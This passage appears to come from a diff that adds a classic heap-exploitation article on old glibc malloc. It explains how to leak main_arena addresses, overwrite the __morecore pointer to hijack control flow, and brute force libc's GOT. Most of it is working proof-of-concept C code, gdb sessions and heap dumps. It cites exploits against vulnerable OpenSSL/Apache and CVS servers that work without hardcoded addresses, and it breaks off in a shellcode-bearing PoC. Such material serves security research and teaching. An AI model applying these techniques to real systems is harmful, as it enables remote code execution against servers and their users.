+        printf("[.] trying %p\n",where);
+
+      aa4bmoPrimitive(where,where);
+
+      for(i=0;i<OUTPUTSZ;i++)
+         if(output[i] != 'O'){
+            printf("(!) you found the output @ %p :(\n",where);
+            printf("[%s]\n",output);
+            return 0;
+         }
+      printf("(-) output was not @ %p :P\n",where);
+   }
+   printf("(x) did not find the output <:|\n");
+}
+
+
+LD_PRELOAD=./heapy.so ./hitOutput 0x8049ccc 0x80498b8 0x8049cd0 0x8049cd4
+0x8049cd8 0x8049cdc 0x80498c8 > output
+
+## OUTPUT hide and seek ##
+
+[.] trying 0x8049ccc
+(-) output was not @ 0x8049ccc :P
+[.] trying 0x80498b8
+(-) output was not @ 0x80498b8 :P
+[.] trying 0x8049cd0
+(-) output was not @ 0x8049cd0 :P
+[.] trying 0x8049cd4
+(-) output was not @ 0x8049cd4 :P
+[.] trying 0x8049cd8
+(-) output was not @ 0x8049cd8 :P
+[.] trying 0x8049cdc
+(-) output was not @ 0x8049cdc :P
+[.] trying 0x80498c8
+(!) you found the output @ 0x80498c8 :(
+[OOOOOOOO~X^D^H~X^D^HOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
+...
+OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO]
+
+Note the stamped output in the following hexdump:
+...
+7920 756f 6620 756f 646e 7420 6568 6f20
+7475 7570 2074 2040 7830 3038 3934 6338
+2038 283a 5b0a 4f4f 4f4f 4f4f 4f4f 98c8   <==
+0804 98c8 0804 4f4f 4f4f 4f4f 4f4f 4f4f   <==
+4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 4f4f
+4f4f 4f4f 4f4f 0a5d
+
+
+This bruteforcing mechanism is not completely accurate in some cases, for
+example, when the target server uses an output buffering scheme.
+In order to improve the technique, we might mark some part of the supplied
+data as real shellcode, and other as nops, requiring the nop part to be hit
+while bruteforcing in order to avoid obtaining an address in the middle of
+our shellcode. Even better, we could tag each four bytes with a masked 
+offset (i.e. to avoid character \x00 i.e.), when we analyse the reply we
+will now obtain the expected offset to the shellcode, so being able in a
+second try to see if actually in that expected address was stored our
+shellcode, detecting and avoiding this way the risk of our input being
+split and stored separated in the heap.
+
+For example, in the CVS 'Directory' double free exploit [7], unrecognized
+commands (i.e. 'cucucucucu') are used to populate the server heap. The
+server does not answer, just stores the provided data in the heap, and
+waits, until a noop or a command is received. After that, the unrecognized
+command that was sent is sent back without any modification to the client.
+We can provide the server with data almost without any size restriction,
+this data is stored in the heap, until we force it to be replayed to us.
+However, analysing how our unrecognized command is stored in the heap we
+find that, instead of what we expected (a single memory chunk with our
+data), there are other structures mixted with our input:
+
+--- HEAP DUMP ---
+            ADDRESS    SIZE               FD           BK
+[...]
+chunk     0x80e9998 0x00661 (F) | 0x40018e48 | 0x40018e48 |
+chunk     0x80e9ff8 0x10008 (A)
+chunk     0x80fa000 0x00ff9 (F) | 0x40018ed0 | 0x0810b000 |
+chunk     0x80faff8 0x10008 (A)
+chunk     0x810b000 0x00ff9 (F) | 0x080fa000 | 0x0811c000 |
+chunk     0x810bff8 0x10008 (A)
+chunk     0x813e000 0x04001 (T)
+sbrk_end  0x8142000
+
+This happens because error messages are buffered when generated, waiting
+to be flushed, some buffering state internal structures get allocated,
+and our data is split and stored in fixed size error buffers.
+
+--] 4.4.3 Modifying user input - finding libc's DATA
+
+In this situation, we are able to provide some input to the vulnerable
+server which is then sent as output to us again. For example, in the CVS
+'Directory' double free() vulnerability, we give the server and invalid
+command, which is finally echoed back to the client explaining it was an
+invalid command.
+If we are able to force a call to free(), to an address pointing in
+somewhere in the middle of our provided input, before it is sent back to
+the client, we will be able to get the address of a main_arena's bin.
+The ability to force a free() pointing to our supplied input, depends
+on the exploitation scenario, being simple to achieve this in
+'double-free' situations.
+When the server frees our input, it founds a very big sized chunk, so
+it links it as the first chunk (lonely chunk) of the bin. This depends
+mainly on the process heap layout, but depending on what we are exploiting
+it should be easy to predict which size would be needed to create the
+new free chunk as a lonely one.
+When frontlink() setups the new free chunk, it saves the bin address
+in the fw and bk pointer of the chunk, being this what ables us to obtain
+later the bin address.
+Note we should be careful with our input chunk, in order to avoid the
+process crashing while freeing our chunk, but this is quite simple in most
+cases, i.e. providing a known address near the end of the stack.
+
+The user provides as input a 'cushion chunk' to the target process. free()
+is called in any part of our input, so our especially crafted chunk is
+inserted in one of the last bins (we may know it's empty from the heap
+analysis stage, avoiding then a process crash). When the provided cushion
+chunk is inserted into the bin, the bin's address is written in the fd and
+bk fields of the chunk's header. 
+
+--] 4.4.3.1 Proof of concept 4 : Freeing the output
+
+The following code creates a 'cushion chunk' as it would be sent to the
+server, and calls free() at a random location within the chunk (as the 
+target server would do).
+The cushion chunk writes to a valid address to avoid crashing the process,
+and its backward and forward pointer are set with the bin's address by
+the frontlink() macro.
+Then, the code looks for the wanted addresses within the output, as would
+do an exploit which received the server answer.
+
+
+#include <stdio.h>
+#define SZ           256
+#define SOMEOFFSET   5 + (rand() % (SZ-1))
+#define PREV_INUSE   1
+#define IS_MMAP      2
+
+unsigned long *aa4bmoPrimitive(unsigned long what, unsigned long where){
+   unsigned long *unlinkMe=(unsigned long*)malloc(SZ*sizeof(unsigned long));
+   int i = 0;
+   unlinkMe[i++] = -4;
+   unlinkMe[i++] = -4;
+   unlinkMe[i++] = what;
+   unlinkMe[i++] = where-8;
+   for(;i<SZ;i++){
+      unlinkMe[i] = ((-(i-1) * 4) & ~IS_MMAP) | PREV_INUSE ;
+   }
+   printf ("(-) calling free() at random address of output buffer...\n");
+   free(unlinkMe+SOMEOFFSET);
+   return unlinkMe;
+}
+
+int main(int argc, char **argv){
+   unsigned long *output;
+   int i;
+
+   printf("## FREEING THE OUTPUT PoC ##\n\n");
+   printf("(-) creating output buffer...\n");
+   output = aa4bmoPrimitive(0xbfffffc0,0xbfffffc4);
+   printf("(-) looking for bin address...\n");
+   for(i=0;i<SZ-1;i++)
+      if(output[i] == output[i+1] && 
+       ((output[i] & 0xffff0000) != 0xffff0000)) {
+         printf("(!) found bin address -> %p\n",output[i]);
+         return 0;
+      }
+   printf("(x) did not find bin address\n");
+}
+
+
+./freeOutput
+
+## FREEING THE OUTPUT PoC ##
+
+(-) creating output buffer...
+(-) calling free() at random address of output buffer...
+(-) looking for bin address...
+(!) found bin address -> 0x4212b1dc
+
+We get chunk free with our provided buffer:
+
+chunk_free (ar_ptr=0x40018040, p=0x8049ab0) at heapy.c:3221
+(gdb) x/20x p
+0x8049ab0:      0xfffffd6d      0xfffffd69      0xfffffd65      0xfffffd61
+0x8049ac0:      0xfffffd5d      0xfffffd59      0xfffffd55      0xfffffd51
+0x8049ad0:      0xfffffd4d      0xfffffd49      0xfffffd45      0xfffffd41
+0x8049ae0:      0xfffffd3d      0xfffffd39      0xfffffd35      0xfffffd31
+0x8049af0:      0xfffffd2d      0xfffffd29      0xfffffd25      0xfffffd21
+(gdb)
+0x8049b00:      0xfffffd1d      0xfffffd19      0xfffffd15      0xfffffd11
+0x8049b10:      0xfffffd0d      0xfffffd09      0xfffffd05      0xfffffd01
+0x8049b20:      0xfffffcfd      0xfffffcf9      0xfffffcf5      0xfffffcf1
+0x8049b30:      0xfffffced      0xfffffce9      0xfffffce5      0xfffffce1
+0x8049b40:      0xfffffcdd      0xfffffcd9      0xfffffcd5      0xfffffcd1
+(gdb)
+0x8049b50:      0xfffffccd      0xfffffcc9      0xfffffcc5      0xfffffcc1
+0x8049b60:      0xfffffcbd      0xfffffcb9      0xfffffcb5      0xfffffcb1
+0x8049b70:      0xfffffcad      0xfffffca9      0xfffffca5      0xfffffca1
+0x8049b80:      0xfffffc9d      0xfffffc99      0xfffffc95      0xfffffc91
+0x8049b90:      0xfffffc8d      0xfffffc89      0xfffffc85      0xfffffc81
+(gdb)
+
+3236      next = chunk_at_offset(p, sz);
+3237      nextsz = chunksize(next);
+3239      if (next == top(ar_ptr)) /* merge with top */
+3278      islr = 0;
+3280      if (!(hd & PREV_INUSE))  /* consolidate backward */
+3294      if (!(inuse_bit_at_offset(next, nextsz)))   
+            /* consolidate forward */
+3296        sz += nextsz;
+3298        if (!islr && next->fd == last_remainder(ar_ptr))
+3306          unlink(next, bck, fwd);
+3315      set_head(p, sz | PREV_INUSE);
+3316      next->prev_size = sz;
+3317      if (!islr) {
+3318        frontlink(ar_ptr, p, sz, idx, bck, fwd);
+
+After the frontlink() macro is called with our supplied buffer, it gets
+the address of the bin in which it is inserted:
+
+fronlink(0x8049ab0,-668,126,0x40018430,0x40018430) new free chunk
+
+(gdb) x/20x p
+
+0x8049ab0:      0xfffffd6d      0xfffffd65      0x40018430      0x40018430
+0x8049ac0:      0xfffffd5d      0xfffffd59      0xfffffd55      0xfffffd51
+0x8049ad0:      0xfffffd4d      0xfffffd49      0xfffffd45      0xfffffd41
+0x8049ae0:      0xfffffd3d      0xfffffd39      0xfffffd35      0xfffffd31
+0x8049af0:      0xfffffd2d      0xfffffd29      0xfffffd25      0xfffffd21
+
+(gdb) c
+Continuing.
+(-) looking for bin address...
+(!) found bin address -> 0x40018430
+
+Let's check the address we obtained:
+
+(gdb) x/20x 0x40018430
+0x40018430 <main_arena+1008>:   0x40018428      0x40018428      0x08049ab0
+0x08049ab0
+0x40018440 <main_arena+1024>:   0x40018438      0x40018438      0x40018040
+0x000007f0
+0x40018450 <main_arena+1040>:   0x00000001      0x00000000      0x00000001
+0x0000016a
+0x40018460 <__FRAME_END__+12>:  0x0000000c      0x00001238      0x0000000d
+0x0000423c
+0x40018470 <__FRAME_END__+28>:  0x00000004      0x00000094      0x00000005
+0x4001370c
+
+And we see it's one of the last bins of the main_arena.
+
+Although in this example we hit the cushion chunk in the first try on
+purpose, this technique can be applied to brute force the location of our
+output buffer also at the same time (if we don't know it beforehand).
+
+
+--] 4.4.4 Vulnerability based heap memory leak - finding libc's data
+
+In this case, the vulnerability itself leads to leaking process memory.
+For example, in the OpenSSL 'SSLv2 Malformed Client Key Buffer Overflow'
+vulnerability [6], the attacker is able to overflow a buffer and overwrite
+a variable used to track a buffer length.
+When this length is overwritten with a length greater than the original,
+the process sends the content of the buffer (stored in the process' heap)
+to the client, sending more information than the originally stored. The
+attacker obtains then a limited portion of the process heap.
+
+---------------------------------------------------------------------------
+--] 4.5 Abusing the leaked information
+
+The goal of the techniques in this section is to exploit the information
+gathered using one of the process information leak tricks shown before.
+
+--] 4.5.1 Recognizing the arena
+
+The idea is to get from the previously gathered information, the address
+of a malloc's bin. This applies mainly to scenarios were we are able to
+leak process heap memory. A bin address can be directly obtained if the
+attacker is able to use the 'freeing the output' technique.
+The obtained bin address can be used later to find the address of a
+function pointer to overwrite with the address of our shellcode, as shown
+in the next techniques.
+
+Remembering how the bins are organized in memory (circular
+double linked lists), we know that a chunk hanging from any bin
+containing just one chunk will have both pointers (bk and fd)
+pointing to the head of the list, to the same address, since the list
+is circular.
+
+   [bin_n]          (first chunk)
+      ptr]  ---->  [<- chunk ->] [<- chunk ->] [<-  fd
+                           [    chunk
+      ptr]  ---->  [<- chunk ->] [<- chunk ->] [<-  bk
+   [bin_n+1]        (last chunk)
+
+     .
+     .
+     .
+
+   [bin_X]
+      ptr] ---->  [<-  fd
+                  [    lonely but interesting chunk
+      ptr] ---->  [<-  bk
+     .
+     .
+
+This is really nice, as it allows us to recognize within the
+heap which address is pointing to a bin, located in libc's space address
+more exactly, to some place in the main_arena as this head of the bin
+list is located in the main_arena.
+
+Then, we can look for two equal memory addresses, one next to the
+other, pointing to libc's memory (looking for addresses of
+the form 0x4....... is enough for our purpose). We can suppose these
+pairs of addresses we found are part of a free chunk which is the only
+one hanging of a bin, we know it looks like...
+
+   size | fd | bk
+
+How easy is to find a lonely chunk in the heap immensity?
+First, this depends on the exploitation scenario and the exploited process
+heap layout. For example, when exploiting the OpenSSL bug along different
+targets, we could always find at least a lonely chunk within the leaked
+heap memory.
+Second, there is another scenario in which we will be able to locate
+a malloc bin, even without the capability to find a lonely chunk. If
+we are able to find the first or last chunk of a bin, one of its
+pointers will reference an address within main_arena, while the
+other one will point to another free chunk in the process heap. So,
+we'll be looking for pairs of valid pointers like these:
+
+   [ ptr_2_libc's_memory | ptr_2_process'_heap ]
+
+   or
+
+   [ ptr_2_process'_heap | ptr_2_libc's_memory ]
+
+We must take into account that this heuristic will not be as accurate
+as searching for a pair of equal pointers to libc's space address, but
+as we already said, it's possible to cross-check between multiple possible
+chunks.
+Finally, we must remember this depends totally on the way we are
+abusing the process to read its memory. In case we can read arbitrary
+addresses of memory, this is not an issue, the problem gets harder
+as more limited is our mechanism to retrieve remote memory.
+
+--] 4.5.2 Morecore
+
+Here, we show how to find a function pointer within the libc after
+obtaining a malloc bin address, using one of the before explained
+mechanisms.
+
+Using the size field of the retrieved chunk header and the bin_index() or
+smallbin_index() macro we obtain the exact address of the main_arena.
+We can cross check between multiple supposed lonely chunks that the
+main_arena address we obtained is the real one, depending on the
+quantity of lonely chunks pairs we'll be more sure. As long as the
+process doesn't crash, we may retrieve heap memory several times, as
+main_arena won't change its location. Moreover, I think it
+wouldn't be wrong to assume main_arena is located in the same address
+across different processes (this depends on the address on which the
+libc is mapped). This may even be true across different servers
+processes, allowing us to retrieve the main_arena through a leak in a
+process different from the one being actively exploited.
+
+Just 32 bytes before &main_arena[0] is located __morecore.
+
+Void_t *(*__morecore)() = __default_morecore;
+
+MORECORE() is the name of the function that is called through malloc
+code in order to obtain more memory from the operating system, it
+defaults to sbrk().
+
+Void_t * __default_morecore ();
+Void_t *(*__morecore)() = __default_morecore;
+#define MORECORE (*__morecore)
+
+The following disassembly shows how MORECORE is called from chunk_alloc()
+code, an indirect call to __default_morecore is performed by default:
+
+<chunk_alloc+1468>:  mov    0x64c(%ebx),%eax
+<chunk_alloc+1474>:  sub    $0xc,%esp
+<chunk_alloc+1477>:  push   %esi
+<chunk_alloc+1478>:  call   *(%eax)
+
+where $eax points to __default_morecore
+
+(gdb) x/x $eax
+0x4212df80 <__morecore>:   0x4207e034
+
+(gdb) x/4i 0x4207e034
+0x4207e034 <__default_morecore>: push   %ebp
+0x4207e035 <__default_morecore+1>:  mov    %esp,%ebp
+0x4207e037 <__default_morecore+3>:  push   %ebx
+0x4207e038 <__default_morecore+4>:  sub    $0x10,%esp
+
+
+MORECORE() is called from the malloc() algorithm to extend the memory top,
+requesting the operating system via the sbrk. 
+
+MORECORE() gets called twice from malloc_extend_top()
+
+    brk = (char*)(MORECORE (sbrk_size));
+    ...
+    /* Allocate correction */
+    new_brk = (char*)(MORECORE (correction));
+
+
+which is called by chunk_alloc():
+
+    /* Try to extend */
+    malloc_extend_top(ar_ptr, nb);
+
+Also, MORECORE is called by main_trim() and top_chunk().
+
+
+We just need to sit and wait until the code reaches any of these points.
+In some cases it may be necessary to arrange things in order to avoid the
+code crashing before. 
+The morecore function pointer is called each time the heap needs to be
+extended, so forcing the process to allocate a lot of memory is
+recommended after overwriting the pointer. 
+In case we are not able to avoid a crash before taking control of the
+process, there's no problem (unless the server dies completely), as we can
+expect the libc to be mapped in the same address in most cases.
+
+--] 4.5.2.1 Proof of concept 5 : Jumping with morecore
+
+The following code just shows to get the required information from a
+freed chunk, calculates the address of __morecore and forces a call
+to MORECORE() after having overwritten it.
+
+[jp@vaiolator heapy]$ ./heapy
+(-) lonely chunk was freed, gathering information...
+   (!) sz = 520 - bk = 0x4212E1A0 - fd = 0x4212E1A0
+   (!) the chunk is in bin number 64
+   (!) &main_arena[0] @ 0x4212DFA0
+   (!) __morecore @ 0x4212DF80
+(-) overwriting __morecore...
+(-) forcing a call to MORECORE()...
+Segmentation fault
+
+Let's look what happened with gdb, we'll also be using a simple
+modified malloc in the form of a shared library to know what is
+going on inside malloc's internal structures.
+
+[jp@vaiolator heapy]$ gdb heapy
+GNU gdb Red Hat Linux (5.2-2)
+Copyright 2002 Free Software Foundation, Inc.
+GDB is free software, covered by the GNU General Public License, and you are
+welcome to change it and/or distribute copies of it under certain conditions.
+Type "show copying" to see the conditions.
+There is absolutely no warranty for GDB.  Type "show warranty" for details.
+This GDB was configured as "i386-redhat-linux"...
+(gdb) r
+Starting program: /home/jp/cerebro//heapy/morecore
+(-) lonely chunk was freed, gathering information...
+   (!) sz = 520 - bk = 0x4212E1A0 - fd = 0x4212E1A0
+   (!) the chunk is in bin number 64
+   (!) &main_arena[0] @ 0x4212DFA0
+   (!) __morecore @ 0x4212DF80
+(-) overwriting __morecore...
+(-) forcing a call to MORECORE()...
+
+Program received signal SIGSEGV, Segmentation fault.
+0x41414141 in ?? ()
+
+
+Taking a look at the output step by step:
+
+First we alloc our lonely chunk:
+    chunk = (unsigned int*)malloc(CHUNK_SIZE);
+(gdb) x/8x chunk-1
+0x80499d4:  0x00000209  0x00000000  0x00000000  0x00000000
+0x80499e4:  0x00000000  0x00000000  0x00000000  0x00000000
+
+Note we call malloc() again with another pointer, letting this aux
+pointer be the chunk next to the top_chunk... to avoid the
+differences in the way it is handled when freed with our purposes
+(remember in this special case the chunk would be coalesced with the
+top_chunk without getting linked to any bin):
+
+        aux = (unsigned int*)malloc(0x0);
+
+[1422] MALLOC(512) - CHUNK_ALLOC(0x40019bc0,520)
+   - returning 0x8049a18 from top_chunk
+   - new top 0x8049c20 size 993
+[1422] MALLOC(0)   - CHUNK_ALLOC(0x40019bc0,16)
+   - returning 0x8049c20 from top_chunk
+   - new top 0x8049c30 size 977
+
+This is the way the heap looks like up to now...
+
+--- HEAP DUMP ---
+                ADDRESS SIZE       FLAGS
+sbrk_base   0x80499f8
+chunk       0x80499f8 33(0x21)   (inuse)
+chunk       0x8049a18 521(0x209) (inuse)
+chunk       0x8049c20 17(0x11)   (inuse)
+chunk       0x8049c30 977(0x3d1) (top)
+sbrk_end    0x804a000
+
+--- HEAP LAYOUT ---
+|A||A||A||T|
+
+--- BIN DUMP ---
+ar_ptr = 0x40019bc0 - top(ar_ptr) = 0x8049c30
+
+No bins at all exist now, they are completely empty.
+
+After that we free him:
+   free(chunk);
+
+[1422] FREE(0x8049a20) - CHUNK_FREE(0x40019bc0,0x8049a18)
+   - fronlink(0x8049a18,520,64,0x40019dc0,0x40019dc0)
+   - new free chunk
+
+(gdb) x/8x chunk-1
+0x80499d4:  0x00000209  0x4212e1a0  0x4212e1a0  0x00000000
+0x80499e4:  0x00000000  0x00000000  0x00000000  0x00000000
+
+The chunk was freed and inserted into some bin... which was empty as
+this was the first chunk freed. So this is a 'lonely chunk', the
+only chunk in one bin.
+Here we can see both bk and fd pointing to the same address in
+libc's memory, let's see how the main_arena looks like now:
+
+0x4212dfa0 <main_arena>:   0x00000000  0x00010000  0x08049be8  0x4212dfa0
+0x4212dfb0 <main_arena+16>:   0x4212dfa8  0x4212dfa8  0x4212dfb0  0x4212dfb0
+0x4212dfc0 <main_arena+32>:   0x4212dfb8  0x4212dfb8  0x4212dfc0  0x4212dfc0
+0x4212dfd0 <main_arena+48>:   0x4212dfc8  0x4212dfc8  0x4212dfd0  0x4212dfd0
+0x4212dfe0 <main_arena+64>:   0x4212dfd8  0x4212dfd8  0x4212dfe0  0x4212dfe0
+0x4212dff0 <main_arena+80>:   0x4212dfe8  0x4212dfe8  0x4212dff0  0x4212dff0
+0x4212e000 <main_arena+96>:   0x4212dff8  0x4212dff8  0x4212e000  0x4212e000
+0x4212e010 <main_arena+112>:  0x4212e008  0x4212e008  0x4212e010  0x4212e010
+0x4212e020 <main_arena+128>:  0x4212e018  0x4212e018  0x4212e020  0x4212e020
+0x4212e030 <main_arena+144>:  0x4212e028  0x4212e028  0x4212e030  0x4212e030
+...
+...
+0x4212e180 <main_arena+480>:  0x4212e178  0x4212e178  0x4212e180  0x4212e180
+0x4212e190 <main_arena+496>:  0x4212e188  0x4212e188  0x4212e190  0x4212e190
+0x4212e1a0 <main_arena+512>:  0x4212e198  0x4212e198  0x080499d0  0x080499d0
+0x4212e1b0 <main_arena+528>:  0x4212e1a8  0x4212e1a8  0x4212e1b0  0x4212e1b0
+0x4212e1c0 <main_arena+544>:  0x4212e1b8  0x4212e1b8  0x4212e1c0  0x4212e1c0
+
+Note the completely just initialized main_arena with all its bins
+pointing to themselves, and the just added free chunk to one of the
+bins...
+
+(gdb) x/4x 0x4212e1a0
+0x4212e1a0 <main_arena+512>:  0x4212e198  0x4212e198  0x080499d0  0x080499d0
+
+Also, both bin pointers refer to our lonely chunk.
+
+Let's take a look at the heap in this moment:
+
+--- HEAP DUMP ---
+                ADDRESS   SIZE       FLAGS
+sbrk_base   0x80499f8
+chunk       0x80499f8 33(0x21)   (inuse)
+chunk       0x8049a18 521(0x209) (free)      fd = 0x40019dc0 | bk = 0x40019dc0
+chunk       0x8049c20 16(0x10)   (inuse)
+chunk       0x8049c30 977(0x3d1) (top)
+sbrk end    0x804a000
+
+--- HEAP LAYOUT ---
+|A||64||A||T|
+
+--- BIN DUMP ---
+ar_ptr = 0x40019bc0 - top(ar_ptr) = 0x8049c30
+   bin -> 64 (0x40019dc0)
+      free_chunk 0x8049a18 - size 520
+
+
+Using the known size of the chunk, we know in which bin it was
+placed, so we can get main_arena's address and, finally, __morecore.
+
+(gdb) x/16x 0x4212dfa0-0x20
+0x4212df80 <__morecore>:   0x4207e034  0x00000000  0x00000000  0x00000000
+0x4212df90 <__morecore+16>:   0x00000000  0x00000000  0x00000000  0x00000000
+0x4212dfa0 <main_arena>:   0x00000000  0x00010000  0x08049be8  0x4212dfa0
+0x4212dfb0 <main_arena+16>:   0x4212dfa8  0x4212dfa8  0x4212dfb0  0x4212dfb0
+
+Here, by default __morecore points to __default_morecore:
+
+(gdb) x/20i __morecore
+0x4207e034 <__default_morecore>: push   %ebp
+0x4207e035 <__default_morecore+1>:  mov    %esp,%ebp
+0x4207e037 <__default_morecore+3>:  push   %ebx
+0x4207e038 <__default_morecore+4>:  sub    $0x10,%esp
+0x4207e03b <__default_morecore+7>:  call   0x4207e030 <memalign_hook_ini+64>
+0x4207e040 <__default_morecore+12>: add    $0xb22cc,%ebx
+0x4207e046 <__default_morecore+18>: mov    0x8(%ebp),%eax
+0x4207e049 <__default_morecore+21>: push   %eax
+0x4207e04a <__default_morecore+22>: call   0x4201722c <_r_debug+33569648>
+0x4207e04f <__default_morecore+27>: mov    0xfffffffc(%ebp),%ebx
+0x4207e052 <__default_morecore+30>: mov    %eax,%edx
+0x4207e054 <__default_morecore+32>: add    $0x10,%esp
+0x4207e057 <__default_morecore+35>: xor    %eax,%eax
+0x4207e059 <__default_morecore+37>: cmp    $0xffffffff,%edx
+0x4207e05c <__default_morecore+40>: cmovne %edx,%eax
+0x4207e05f <__default_morecore+43>: mov    %ebp,%esp
+0x4207e061 <__default_morecore+45>: pop    %ebp
+0x4207e062 <__default_morecore+46>: ret
+0x4207e063 <__default_morecore+47>: lea    0x0(%esi),%esi
+0x4207e069 <__default_morecore+53>: lea    0x0(%edi,1),%edi
+
+To conclude, we overwrite __morecore with a bogus address, and force
+malloc to call __morecore:
+
+   *(unsigned int*)morecore = 0x41414141;
+   chunk=(unsigned int*)malloc(CHUNK_SIZE*4);
+
+[1422] MALLOC(2048) - CHUNK_ALLOC(0x40019bc0,2056)
+   - extending top chunk
+   - previous size 976
+
+Program received signal SIGSEGV, Segmentation fault.
+0x41414141 in ?? ()
+
+(gdb) bt
+#0  0x41414141 in ?? ()
+#1  0x4207a148 in malloc () from /lib/i686/libc.so.6
+#2  0x0804869d in main (argc=1, argv=0xbffffad4) at heapy.c:52
+#3  0x42017589 in __libc_start_main () from /lib/i686/libc.so.6
+
+(gdb) frame 1
+#1  0x4207a148 in malloc () from /lib/i686/libc.so.6
+(gdb) x/i $pc-0x5
+0x4207a143 <malloc+195>:   call   0x4207a2f0 <chunk_alloc>
+(gdb) disass chunk_alloc
+Dump of assembler code for function chunk_alloc:
+...
+0x4207a8ac <chunk_alloc+1468>:   mov    0x64c(%ebx),%eax
+0x4207a8b2 <chunk_alloc+1474>:   sub    $0xc,%esp
+0x4207a8b5 <chunk_alloc+1477>:   push   %esi
+0x4207a8b6 <chunk_alloc+1478>:   call   *(%eax)
+
+At this point we see chunk_alloc trying to jump to __morecore
+
+(gdb) x/x $eax
+0x4212df80 <__morecore>:   0x41414141
+
+#include <stdio.h>
+#include <stdlib.h>
+
+/* some malloc code... */
+#define MAX_SMALLBIN         63
+#define MAX_SMALLBIN_SIZE   512
+#define SMALLBIN_WIDTH        8
+#define is_small_request(nb) ((nb) < MAX_SMALLBIN_SIZE - SMALLBIN_WIDTH)
+#define smallbin_index(sz)  (((unsigned long)(sz)) >> 3)
+#define bin_index(sz)                           \
+ (((((unsigned long)(sz)) >> 9) ==   0) ?       (((unsigned long)(sz)) >>  3):\
+ ((((unsigned long)(sz)) >> 9) <=    4) ?  56 + (((unsigned long)(sz)) >>  6):\
+ ((((unsigned long)(sz)) >> 9) <=   20) ?  91 + (((unsigned long)(sz)) >>  9):\
+ ((((unsigned long)(sz)) >> 9) <=   84) ? 110 + (((unsigned long)(sz)) >> 12):\
+ ((((unsigned long)(sz)) >> 9) <=  340) ? 119 + (((unsigned long)(sz)) >> 15):\
+ ((((unsigned long)(sz)) >> 9) <= 1364) ? 124 + (((unsigned long)(sz)) >> 18):\
+                                          126)
+
+#define SIZE_MASK 0x3
+#define CHUNK_SIZE 0x200
+
+int main(int argc, char *argv[]){
+
+        unsigned int *chunk,*aux,sz,bk,fd,bin,arena,morecore;
+        chunk = (unsigned int*)malloc(CHUNK_SIZE);
+        aux = (unsigned int*)malloc(0x0);
+
+        free(chunk);
+        printf("(-) lonely chunk was freed, gathering information...\n");
+
+        sz = chunk[-1] & ~SIZE_MASK;
+        fd = chunk[0];
+        bk = chunk[1];
+
+        if(bk==fd) printf("\t(!) sz = %u - bk = 0x%X - fd = 0x%X\n",sz,bk,fd);
+        else printf("\t(X) bk != fd ...\n"),exit(-1);
+
+        bin = is_small_request(sz)? smallbin_index(sz) : bin_index(sz);
+        printf("\t(!) the chunk is in bin number %d\n",bin);
+
+        arena = bk-bin*2*sizeof(void*);
+        printf("\t(!) &main_arena[0] @ 0x%X\n",arena);
+
+        morecore = arena-32;
+        printf("\t(!) __morecore @ 0x%X\n",morecore);
+
+        printf("(-) overwriting __morecore...\n");
+        *(unsigned int*)morecore = 0x41414141;
+
+        printf("(-) forcing a call to MORECORE()...\n");
+        chunk=(unsigned int*)malloc(CHUNK_SIZE*4);
+
+        return 7;
+}
+
+This technique works even when the process is loaded in a randomized
+address space, as the address of the function pointer is gathered in
+runtime from the targeted process. The mechanism is fully generic, as
+every process linked to the glibc can be exploited this way.
+Also, no bruteforcing is needed, as just one try is enough to exploit the
+process.
+On the other hand, this technique is not longer useful in newer libcs, 
+i.e. 2.2.93, a for the changed suffered by malloc code. A new approach
+is suggested later to help in exploitation of these libc versions.
+Morecore idea was successfully tested on different glibc versions and Linux
+distributions default installs: Debian 2.2r0, Mandrake 8.1, Mandrake
+8.2, Redhat 6.1, Redhat 6.2, Redhat 7.0, Redhat 7.2, Redhat 7.3 and
+Slackware 2.2.19 (libc-2.2.3.so).
+Exploit code using this trick is able to exploit the vulnerable 
+OpenSSL/Apache servers without any hardcoded addresses in at least the
+above mentioned default distributions.
+
+--] 4.5.3 Libc's GOT bruteforcing
+
+In case the morecore trick doesn't work (we can try, as just requires
+one try), meaning probably that our target is using a newer libc, we
+still have the obtained glibc's bin address. We know that above that 
+address is going to be located the glibc's GOT.
+We just need to bruteforce upwards until hitting any entry of a going to
+be called libc function. This bruteforce mechanism may take a while, but
+not more time that should be needed to bruteforce the main object's GOT
+(in case we obtained its aproximate location some way). 
+To speed up the process, the bruteforcing start point should be obtained
+by adjusting the retrieved bin address with a fixed value. This value
+should be enough to avoid corrupting the arena to prevent crashing the
+process. Also, the bruteforcing can be performed using a step size bigger
+than one. Using a higher step value will need a less tries, but may miss
+the GOT. The step size should be calculated considering the GOT size and
+the number of GOT entries accesses between each try (if a higher number
+of GOT entries are used, it's higher the probability of modifying an entry
+that's going to be accessed).
+After each try, it is important to force the server to perform as many
+actions as possible, in order to make it call lots of different libc
+calls so the probability of using the GOT entry that was overwritten
+is higher.
+
+Note the bruteforcing mechanism may crash the process in several ways, as
+it is corrupting libc data.
+
+As we obtained the address in runtime, we can be sure we are bruteforcing
+the right place, even if the target is randomizing the process/lib address
+space, and that we will end hitting some GOT entry. 
+In a randomized load address scenario, we'll need to hit a GOT entry
+before the process crashes to exploit the obtained bin address if there
+is no relationship between the load addresses in the crashed process (the
+one we obtained the bin address from) and the new process handling our 
+new requests (i.e. forked processes may inherit father's memory layout in
+some randomization implementations). However, the bruteforcing mechanism
+can take into account the already tried offsets once it has obtained the
+new bin address, as the relative offset between the bin and the GOT is
+constant.
+
+Moreover, this technique applies to any process linked to the glibc.
+Note that we could be able to exploit a server bruteforcing some specific
+function pointers (i.e. located in some structures such as network output
+buffers), but these approach is more generic.
+
+The libc's GOT bruteforcing idea was successfully tested in Redhat 8.0,
+Redhat 7.2 and Redhat 7.1 default installations.
+Exploit code bruteforcing libc's GOT is able to exploit the vulnerable
+CVS servers without any hardcoded addresses in at least the above
+mentioned default distributions.
+
+--] 4.5.3.1 Proof of concept 6 : Hinted libc's GOT bruteforcing
+
+The following code bruteforces itself. The process tries to find himself,
+to finally end in an useless endless loop.
+
+#include <stdio.h>
+#include <fcntl.h>
+
+#define ADJUST          0x200
+#define STEP            0x2
+
+#define LOOP_SC         "\xeb\xfe"
+#define LOOP_SZ         2
+#define SC_SZ           512
+#define OUTPUT_SZ       64 * 1024
+
+#define SOMEOFFSET(x)   11 + (rand() % ((x)-1-11))
+#define SOMECHUNKSZ     32 + (rand() % 512)
+
+#define PREV_INUSE      1
+#define IS_MMAP         2
